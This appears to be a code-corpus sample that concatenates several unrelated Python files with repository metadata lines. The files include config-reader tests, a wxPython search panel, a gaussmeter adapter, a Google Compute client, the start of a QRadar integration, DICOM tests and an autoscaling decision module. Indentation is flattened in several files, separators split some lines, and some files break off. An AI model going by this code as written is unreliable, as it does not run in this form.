# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.config import ConfigReader, ConfigFileReadError
import unittest
class TestConfigReader(unittest.TestCase):
def test_get_returns_string_config_value(self):
'''
Test config value returned is expected value
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("string_test")
self.assertEqual(value, "some value", "Value did not match expected.")
def test_get_with_default_value(self):
"Test the get method returns value if available or the the default."
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("some value", config.get("string_test", "default value"))
self.assertEqual("default value", config.get("i_dont_exist", "default value"))
def test_get_handles_namespaced_keys(self):
'''
Test ConfigReader works with namespaced keys like, path.to.element
'''
config = ConfigReader("tests/TestConfigReaderData")
value = config.get("bill-to.given")
self.assertEqual(value, "Chris", "Value did not match expected.")
def test_get_handles_yaml_arrays(self):
'''
Test ConfigReader works with YAML arrays.
'''
config = ConfigReader("tests/TestConfigReaderData")
self.assertEqual("dogs", config.get("list_test")[0])
self.assertEqual("cats", config.get("list_test")[1])
self.assertEqual("badgers", config.get("list_test")[2])
def test_get_with_cascaded_config_files(self):
'''
Test Config reader loaded up with multiple configs loads
the config preferences in order.
'''
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertEqual("hello", config.get("setting_from_config1"))
# this will take the config from config2, which has precedence.
self.assertEqual("beautiful", config.get("overwrite_setting"))
# this will take the setting form config2.
self.assertEqual("hi", config.get("setting_from_config2"))
def test_get_with_missing_key_and_no_default(self):
"An error should be thrown if the key is missing and no default provided."
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertRaises(KeyError, config.get, "setting_that_doesnt_exist")
    def test_specifying_bad_config_file(self):
"Test error is thrown when invalid config file is specified."
self.assertRaises(ConfigFileReadError, ConfigReader, "tests/TestConfig1,NOSUCHFILE")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
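# Illustrative sketch (hypothetical, not shipped with these tests): a YAML
# config file consistent with the assertions above might look like
#
#     string_test: some value
#     bill-to:
#       given: Chris
#     list_test:
#       - dogs
#       - cats
#       - badgers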
|
unreal666/outwiker
|
src/outwiker/gui/searchreplacepanel.py
|
Python
|
gpl-3.0
| 6,309
| 0
|
# -*- coding: utf-8 -*-
import os.path
import wx
from outwiker.core.system import getImagesDir
class SearchReplacePanel (wx.Panel):
def __init__(self, parent):
super(SearchReplacePanel, self).__init__(
parent,
style=wx.TAB_TRAVERSAL | wx.RAISED_BORDER)
self._controller = None
self._createGui()
self._bindEvents()
        # List of GUI elements related to the replace feature
self._replaceGui = [self._replaceLabel,
self._replaceText,
self._replaceBtn,
self._replaceAllBtn,
]
self.setReplaceGuiVisible(False)
def setController(self, controller):
self._controller = controller
@property
def searchTextCtrl(self):
return self._searchText
@property
def replaceTextCtrl(self):
return self._replaceText
@property
def resultLabel(self):
return self._resultLabel
def setReplaceGuiVisible(self, visible):
"""
        Set whether the replace-related GUI elements should be shown
"""
for item in self._replaceGui:
item.Show(visible)
self.Layout()
def _bindEvents(self):
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._searchText)
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._replaceText)
self.Bind(wx.EVT_TEXT, self.__onSearchTextChange, self._searchText)
self.Bind(wx.EVT_BUTTON, self.__onNextSearch, self._nextSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onPrevSearch, self._prevSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplace, self._replaceBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplaceAll, self._replaceAllBtn)
self.Bind(wx.EVT_BUTTON, self.__onCloseClick, self._closeBtn)
for child in self.GetChildren():
child.Bind(wx.EVT_KEY_DOWN, self.__onKeyPressed)
def _createGui(self):
        # Input field for the search phrase
self._searchText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
        # Text to replace with
self._replaceText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
        # Interface elements related to searching
        self._findLabel = wx.StaticText(self, -1, _(u"Find what: "))
        # "Find next" button
        self._nextSearchBtn = wx.Button(self, -1, _(u"Next"))
        # "Find previous" button
        self._prevSearchBtn = wx.Button(self, -1, _(u"Prev"))
        # Label showing the search result
        self._resultLabel = wx.StaticText(self, -1, "")
        self._resultLabel.SetMinSize((150, -1))
        # Interface elements related to replacing
        self._replaceLabel = wx.StaticText(self, -1, _(u"Replace with: "))
        # "Replace" button
        self._replaceBtn = wx.Button(self, -1, _(u"Replace"))
        # "Replace All" button
        self._replaceAllBtn = wx.Button(self, -1, _(u"Replace All"))
self._closeBtn = wx.BitmapButton(
self,
-1,
wx.Bitmap(os.path.join(getImagesDir(), "close-button.png"),
wx.BITMAP_TYPE_ANY))
self._layout()
def _layout(self):
self._mainSizer = wx.FlexGridSizer(cols=6)
self._mainSizer.AddGrowableCol(1)
        # Interface elements for searching
self._mainSizer.Add(self._findLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._searchText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._nextSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._prevSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._closeBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=1)
self._mainSizer.Add(self._resultLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
        # Interface elements for replacing
self._mainSizer.Add(self._replaceLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._replaceAllBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
# self._mainSizer.AddStretchSpacer()
# self._mainSizer.AddStretchSpacer()
self.SetSizer(self._mainSizer)
self.Layout()
def __onNextSearch(self, event):
if self._controller is not None:
self._controller.nextSearch()
def __onPrevSearch(self, event):
if self._controller is not None:
self._controller.prevSearch()
def __onReplace(self, event):
if self._controller is not None:
self._controller.replace()
def __onReplaceAll(self, event):
if self._controller is not None:
self._controller.replaceAll()
def __onSearchTextChange(self, event):
if self._controller is not None:
self._controller.enterSearchPhrase()
def __onKeyPressed(self, event):
key = event.GetKeyCode()
if key == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def __onEnterPress(self, event):
if self._controller is None:
return
if self._replaceText.IsShown():
self._controller.replace()
else:
self._controller.nextSearch()
def __onCloseClick(self, event):
self.Close()
|
MichalKononenko/MrFreeze
|
mr_freeze/devices/lakeshore_475.py
|
Python
|
agpl-3.0
| 2,013
| 0.000497
|
"""
Contains methods for working with the Lakeshore 475 Gaussmeter
"""
from quantities import Quantity
from typing import Optional
from instruments.lakeshore import Lakeshore475 as _Lakeshore475
from time import sleep
class Lakeshore475(object):
"""
Adapter layer for IK's Lakeshore 475 implementation
"""
_port = '/dev/ttyUSB0'
_address = 12
_managed_instance = None
_constructor = _Lakeshore475
@property
def port_name(self) -> str:
"""
:return: The port to which this magnetometer will be attached
"""
return self._port
@port_name.setter
def port_name(self, new_port_name: str) -> None:
"""
:param new_port_name: The new port
:return:
"""
self._port = new_port_name
@property
def address(self) -> int:
"""
:return: The address
"""
return self._address
@address.setter
def address(self, new_address: int) -> None:
"""
:param new_address: The desired address
:return:
"""
self._address = new_address
@property
def _magnetometer(self) -> Optional[_Lakeshore475]:
"""
|
:return: The instance of
|
the magnetometer that this adapter manages, or
None if there is no instance.
.. note::
The 1 second delay is required for the gaussmeter to reset
itself and accept commands
"""
if self._managed_instance is None:
self._managed_instance = self._constructor.open_gpibusb(
port=self.port_name, gpib_address=self.address)
sleep(1)
return self._managed_instance
@property
def field(self) -> Quantity:
"""
:return: The measured magnetic field from the Gaussmeter
"""
try:
return self._magnetometer.field
except ValueError:
return -100000.0 * self._magnetometer.field_units # type:
# Quantity
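# Illustrative usage sketch (the port and GPIB address below are just the class
# defaults; real hardware may differ):
#
#     gaussmeter = Lakeshore475()
#     gaussmeter.port_name = '/dev/ttyUSB0'
#     gaussmeter.address = 12
#     gaussmeter.field   # lazily opens the GPIB-USB connection, waits 1 s, then reads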
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/scripts/apps/packagemanager/script_settings.py
|
Python
|
gpl-3.0
| 87
| 0.022989
|
../../../../../../../share/pyshared/orca/scripts/apps/packagemanager/script_settings.py
|
googleapis/python-compute
|
google/cloud/compute_v1/services/target_tcp_proxies/client.py
|
Python
|
apache-2.0
| 42,291
| 0.001537
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError  # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.compute_v1.services.target_tcp_proxies import pagers
from google.cloud.compute_v1.types import compute
from .transports.base import TargetTcpProxiesTransport, DEFAULT_CLIENT_INFO
from .transports.rest import TargetTcpProxiesRestTransport
class TargetTcpProxiesClientMeta(type):
"""Metaclass for the TargetTcpProxies client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TargetTcpProxiesTransport]]
_transport_registry["rest"] = TargetTcpProxiesRestTransport
def get_transport_class(cls, label: str = None,) -> Type[TargetTcpProxiesTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
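# Illustrative behaviour (derived from the registry above, not from upstream
# docs): with only the "rest" transport registered, both of these return
# TargetTcpProxiesRestTransport.
#
#     TargetTcpProxiesClient.get_transport_class()
#     TargetTcpProxiesClient.get_transport_class("rest")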
class TargetTcpProxiesClient(metaclass=TargetTcpProxiesClientMeta):
"""The TargetTcpProxies API."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
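    # Illustrative conversions performed by the helper above (derived from the
    # regex, not from upstream docs):
    #   "compute.googleapis.com"          -> "compute.mtls.googleapis.com"
    #   "compute.sandbox.googleapis.com"  -> "compute.mtls.sandbox.googleapis.com"
    #   "compute.mtls.googleapis.com"     -> returned unchanged (already mTLS)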
DEFAULT_ENDPOINT = "compute.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TargetTcpProxiesTransport:
"""Returns the transport used by the client instance.
Returns:
TargetTcpProxiesTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/
|
demisto/content
|
Packs/QRadar/Integrations/QRadar_v3/QRadar_v3.py
|
Python
|
mit
| 164,136
| 0.003649
|
import concurrent.futures
import secrets
from enum import Enum
from ipaddress import ip_address
from typing import Tuple, Set, Dict, Callable
from urllib import parse
import pytz
import urllib3
from CommonServerUserPython import * # noqa
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
# Disable insecure warnings
urllib3.disable_warnings() # pylint: disable=no-member
''' ADVANCED GLOBAL PARAMETERS '''
SAMPLE_SIZE = 2 # number of samples to store in integration context
EVENTS_INTERVAL_SECS = 15 # interval between events polling
EVENTS_FAILURE_LIMIT = 3 # amount of consecutive failures events fetch will tolerate
FAILURE_SLEEP = 15 # sleep between consecutive failures events fetch
FETCH_SLEEP = 60  # sleep between fetches
BATCH_SIZE = 100 # batch size used for offense ip enrichment
OFF_ENRCH_LIMIT = BATCH_SIZE * 10 # max amount of IPs to enrich per offense
MAX_WORKERS = 8 # max concurrent workers used for events enriching
DOMAIN_ENRCH_FLG = 'true' # when set to true, will try to enrich offense and assets with domain names
RULES_ENRCH_FLG = 'true'  # when set to true, will try to enrich offense with rule names
MAX_FETCH_EVENT_RETIRES = 3 # max iteration to try search the events of an offense
SLEEP_FETCH_EVENT_RETIRES = 10 # sleep between iteration to try search the events of an offense
MAX_NUMBER_OF_OFFENSES_TO_CHECK_SEARCH = 5 # Number of offenses to check during mirroring if search was completed.
DEFAULT_EVENTS_TIMEOUT = 30 # default timeout for the events enrichment in minutes
PROFILING_DUMP_ROWS_LIMIT = 20
ADVANCED_PARAMETERS_STRING_NAMES = [
'DOMAIN_ENRCH_FLG',
'RULES_ENRCH_FLG',
]
ADVANCED_PARAMETER_INT_NAMES = [
'EVENTS_INTERVAL_SECS',
'EVENTS_FAILURE_LIMIT',
'FAILURE_SLEEP',
'FETCH_SLEEP',
'BATCH_SIZE',
'OFF_ENRCH_LIMIT',
'MAX_WORKERS',
'MAX_FETCH_EVENT_RETIRES',
'SLEEP_FETCH_EVENT_RETIRES',
'DEFAULT_EVENTS_TIMEOUT',
'PROFILING_DUMP_ROWS_LIMIT',
]
''' CONSTANTS '''
API_USERNAME = '_api_token_key'
RESET_KEY = 'reset'
LAST_FETCH_KEY = 'id'
MINIMUM_API_VERSION = 10.1
DEFAULT_RANGE_VALUE = '0-49'
DEFAULT_TIMEOUT_VALUE = '35'
DEFAULT_LIMIT_VALUE = 50
MAXIMUM_MIRROR_LIMIT = 100
DEFAULT_EVENTS_LIMIT = 20
MAXIMUM_OFFENSES_PER_FETCH = 50
DEFAULT_OFFENSES_PER_FETCH = 20
DEFAULT_MIRRORING_DIRECTION = 'No Mirroring'
MIRROR_OFFENSE_AND_EVENTS = 'Mirror Offense and Events'
MIRROR_DIRECTION: Dict[str, Optional[str]] = {
'No Mirroring': None,
'Mirror Offense': 'In',
MIRROR_OFFENSE_AND_EVENTS: 'In'
}
MIRRORED_OFFENSES_CTX_KEY = 'mirrored_offenses'
UPDATED_MIRRORED_OFFENSES_CTX_KEY = 'updated_mirrored_offenses'
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY = 'resubmitted_mirrored_offenses'
UTC_TIMEZONE = pytz.timezone('utc')
ID_QUERY_REGEX = re.compile(r'(?:\s+|^)id((\s)*)>(=?)((\s)*)((\d)+)(?:\s+|$)')
ASCENDING_ID_ORDER = '+id'
EXECUTOR = concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)
''' OUTPUT FIELDS REPLACEMENT MAPS '''
OFFENSE_OLD_NEW_NAMES_MAP = {
'credibility': 'Credibility',
'relevance': 'Relevance',
'severity': 'Severity',
'assigned_to': 'AssignedTo',
'destination_networks': 'DestinationHostname',
'status': 'Status',
'closing_user': 'ClosingUser',
'closing_reason_id': 'ClosingReason',
'close_time': 'CloseTime',
'categories': 'Categories',
'follow_up': 'Followup',
'id': 'ID',
'description': 'Description',
'source_address_ids': 'SourceAddress',
'local_destination_address_ids': 'DestinationAddress',
'remote_destination_count': 'RemoteDestinationCount',
'start_time': 'StartTime',
'event_count': 'EventCount',
'flow_count': 'FlowCount',
'offense_source': 'OffenseSource',
'magnitude': 'Magnitude',
'last_updated_time': 'LastUpdatedTime',
'offense_type': 'OffenseType',
'protected': 'Protected',
'LinkToOffense': 'LinkToOffense',
'rules': 'Rules',
'domain_name': 'DomainName',
'assets': 'Assets'
}
CLOSING_REASONS_OLD_NEW_MAP = {
'id': 'ID',
'text': 'Name',
'is_reserved': 'IsReserved',
'is_deleted': 'IsDeleted'
}
NOTES_OLD_NEW_MAP = {
'id': 'ID',
'note_text': 'Text',
'create_time': 'CreateTime',
'username': 'CreatedBy'
}
RULES_OLD_NEW_MAP = {
'owner': 'Owner',
'base_host_id': 'BaseHostID',
'capacity_timestamp': 'CapacityTimestamp',
'origin': 'Origin',
'creation_date': 'CreationDate',
'type': 'Type',
'enabled': 'Enabled',
'modification_date': 'ModificationDate',
'name': 'Name',
'average_capacity': 'AverageCapacity',
'id': 'ID',
'base_capacity': 'BaseCapacity'
}
RULES_GROUP_OLD_NEW_MAP = {
'owner': 'Owner',
'modified_time': 'ModifiedTime',
'level': 'Level',
'name': 'Name',
'description': 'Description',
'id': 'ID',
'child_groups': 'ChildGroups',
'child_items': 'ChildItems',
'type': 'Type',
'parent_id': 'ParentID'
}
ASSET_OLD_NEW_MAP = {
'vulnerability_count': 'VulnerabilityCount',
'interfaces': 'Interfaces',
'risk_score_sum': 'RiskScoreSum',
'hostnames': 'Hostnames',
'id': 'ID',
'users': 'Users',
'domain_id': 'DomainID',
'properties': 'Properties',
'products': 'Products'
}
SEARCH_OLD_NEW_MAP = {'search_id': 'ID', 'status': 'Status'}
REFERENCE_SETS_OLD_NEW_MAP = {
'number_of_elements': 'NumberOfElements',
'name': 'Name',
'creation_time': 'CreationTime',
'element_type': 'ElementType',
'time_to_live': 'TimeToLive',
'timeout_type': 'TimeoutType',
'data': 'Data',
}
REFERENCE_SET_DATA_OLD_NEW_MAP = {
'last_seen': 'LastSeen',
'source': 'Source',
'value': 'Value',
'first_seen': 'FirstSeen'
}
DOMAIN_OLD_NEW_MAP = {
'asset_scanner_ids': 'AssetScannerIDs',
'custom_properties': 'CustomProperties',
'deleted': 'Deleted',
'description': 'Description',
'event_collector_ids': 'EventCollectorIDs',
'flow_collector_ids': 'FlowCollectorIDs',
'flow_source_ids': 'FlowSourceIDs',
'id': 'ID',
'log_source_ids': 'LogSourceIDs',
'log_source_group_ids': 'LogSourceGroupIDs',
'name': 'Name',
'qvm_scanner_ids': 'QVMScannerIDs',
'tenant_id': 'TenantID'
}
SAVED_SEARCH_OLD_NEW_MAP = {
'owner': 'Owner',
'description': 'Description',
'creation_date': 'CreationDate',
'uid': 'UID',
'database': 'Database',
'is_quick_search': 'QuickSearch',
'name': 'Name',
'modified_date': 'ModifiedDate',
'id': 'ID',
'aql': 'AQL',
'is_shared': 'IsShared'
}
IP_GEOLOCATION_OLD_NEW_MAP = {
'continent': 'Continent',
'traits': 'Traits',
'geo_json': 'Geolocation',
'city': 'City',
'ip_address': 'IPAddress',
'represented_country': 'RepresentedCountry',
'registered_country': 'RegisteredCountry',
'is_local': 'IsLocalCountry',
'location': 'Location',
'postal': 'Postal',
'physical_country': 'PhysicalCountry',
'subdivisions': 'SubDivisions'
}
LOG_SOURCES_OLD_NEW_MAP = {
'sending_ip': 'SendingIP',
'internal': 'Internal',
'protocol_parameters': 'ProtocolParameters',
'description': 'Description',
'enabled': 'Enabled',
'group_ids': 'GroupIDs',
'credibility': 'Credibility',
'id': 'ID',
'protocol_type_id': 'ProtocolTypeID',
'creation_date': 'CreationDate',
'name': 'Name',
'modified_date': 'ModifiedDate',
'auto_discovered': 'AutoDiscovered',
'type_id': 'TypeID',
'last_event_time': 'LastEventTime',
'gateway': 'Gateway',
'status': 'Status'
}
USECS_ENTRIES = {'last_persisted_time',
'start_time',
'close_time',
'create_time',
'creation_time',
'creation_date',
'last_updated_time',
'first_persisted_time',
'modification_date',
'last_seen',
'first_seen',
'starttime',
'devicetime',
'last_reported',
'created',
'last_seen_profiler',
'last_seen_scanner',
'first_seen_scanner',
'first_se
|
comic/comic-django
|
app/tests/cases_tests/test_dicom.py
|
Python
|
apache-2.0
| 5,037
| 0
|
import os
from collections import defaultdict
from dataclasses import asdict
from pathlib import Path
from unittest import mock
import numpy as np
import pydicom
import pytest
from panimg.image_builders.dicom import (
_get_headers_by_study,
_validate_dicom_files,
format_error,
image_builder_dicom,
)
from panimg.image_builders.metaio_utils import parse_mh_header
from panimg.panimg import _build_files
from grandchallenge.cases.models import Image
from tests.cases_tests import RESOURCE_PATH
DICOM_DIR = RESOURCE_PATH / "dicom"
def test_get_headers_by_study():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 1
for key in studies:
assert [str(x["file"]) for x in studies[key]["headers"]] == [
f"{DICOM_DIR}/{x}.dcm" for x in range(1, 77)
]
for root, _, files in os.walk(RESOURCE_PATH):
files = [Path(root).joinpath(f) for f in files]
break
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 0
def test_validate_dicom_files():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _validate_dicom_files(files, defaultdict(list))
assert len(studies) == 1
for study in studies:
headers = study.headers
assert study.n_time == 19
assert study.n_slices == 4
with mock.patch(
"panimg.image_builders.dicom._get_headers_by_study",
return_value={
"foo": {"headers": header
|
s[1:], "file": "bar", "index": 1},
},
):
errors = defaultdict(list)
studies = _validate_dicom_files(files, errors)
assert len(studies) == 0
for header in headers[1:]:
assert errors[header["file"]] == [
format_error("Number of slices per time point differs")
]
def test_image_builder_dicom_4dct(tmpdir):
files = {Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert result.consumed_files == {
Path(DICOM_DIR).joinpath(f"{x}.dcm") for x in range(1, 77)
}
assert len(result.new_images) == 1
image = Image(**asdict(result.new_images.pop()))
assert image.shape == [19, 4, 2, 3]
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
direction = headers["TransformMatrix"].split()
origin = headers["Offset"].split()
spacing = headers["ElementSpacing"].split()
exposures = headers["Exposures"].split()
content_times = headers["ContentTimes"].split()
assert len(exposures) == 19
assert exposures == [str(x) for x in range(100, 2000, 100)]
assert len(content_times) == 19
assert content_times == [str(x) for x in range(214501, 214520)]
dcm_ref = pydicom.dcmread(str(DICOM_DIR / "1.dcm"))
assert np.array_equal(
np.array(list(map(float, direction))).reshape((4, 4)), np.eye(4)
)
assert np.allclose(
list(map(float, spacing))[:2],
list(map(float, list(dcm_ref.PixelSpacing),)),
)
assert np.allclose(
list(map(float, origin)),
list(map(float, dcm_ref.ImagePositionPatient)) + [0.0],
)
@pytest.mark.parametrize(
"folder,element_type",
[
("dicom", "MET_SHORT"),
("dicom_intercept", "MET_FLOAT"),
("dicom_slope", "MET_FLOAT"),
],
)
def test_dicom_rescaling(folder, element_type, tmpdir):
"""
2.dcm in dicom_intercept and dicom_slope has been modified to add a
small intercept (0.01) or slope (1.001) respectively.
"""
files = [
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / folder)
for f in d[2]
]
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["ElementType"] == element_type
def test_dicom_window_level(tmpdir):
files = {
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / "dicom")
for f in d[2]
}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["WindowCenter"] == "30"
assert headers["WindowWidth"] == "200"
assert len(result.new_images) == 1
image_obj = result.new_images.pop()
assert image_obj.window_center == 30.0
assert image_obj.window_width == 200.0
|
cmantas/tiramola_v3
|
new_decision_module.py
|
Python
|
apache-2.0
| 36,005
| 0.007055
|
__author__ = 'tiramola group'
import os, datetime, operator, math, random, itertools, time
import numpy as np
from lib.fuzz import fgraph, fset
from scipy.cluster.vq import kmeans2
from lib.persistance_module import env_vars
from scipy.stats import linregress
from collections import deque
from lib.tiramola_logging import get_logger
from Predictor import Predictor
class RLDecisionMaker:
def __init__(self, cluster):
#Create logger
LOG_FILENAME = 'files/logs/Coordinator.log'
self.log = get_logger('RLDecisionMaker', 'INFO', logfile=LOG_FILENAME)
self.log.info("Using 'gain' : " + env_vars['gain'] +" with threshold of "+str( env_vars["decision_threshold"]*100) + "% and interval: " + str(env_vars['decision_interval']))
self.log.info("Cluster Size from %d to %d nodes" % (env_vars['min_cluster_size'], env_vars['max_cluster_size']))
self.debug = False
if self.debug:
self.currentState = 8
else:
self.currentState = cluster.node_count()
self.cluster = cluster
self.nextState = self.currentState
self.waitForIt = env_vars['decision_interval'] / env_vars['metric_fetch_interval']
self.pending_action = None
self.decision = {"action": "PASS", "count": 0}
# The policy for getting throughput and latency when computing the reward func.
# average, centroid
self.measurementsPolicy = 'centroid'
self.prediction = env_vars['use_prediction']
self.predictor = Predictor()
# used only in simulation!!
self.countdown = 0
# A dictionary that will remember rewards and metrics in states previously visited
self.memory = {}
for i in range(env_vars["min_cluster_size"], env_vars["max_cluster_size"] + 1):
self.memory[str(i)] = {}
#self.memory[str(i)]['V'] = None # placeholder for rewards and metrics
self.memory[str(i)]['r'] = None
self.memory[str(i)]['arrayMeas'] = None
# Load any previous statics.
self.measurementsFile = env_vars["measurements_file"]
self.trainingFile = env_vars["training_file"]
self.sumMetrics = {}
# initialize measurements file
meas = open(self.measurementsFile, 'a+')
if os.stat(self.measurementsFile).st_size == 0:
# The file is empty, set the headers for each column.
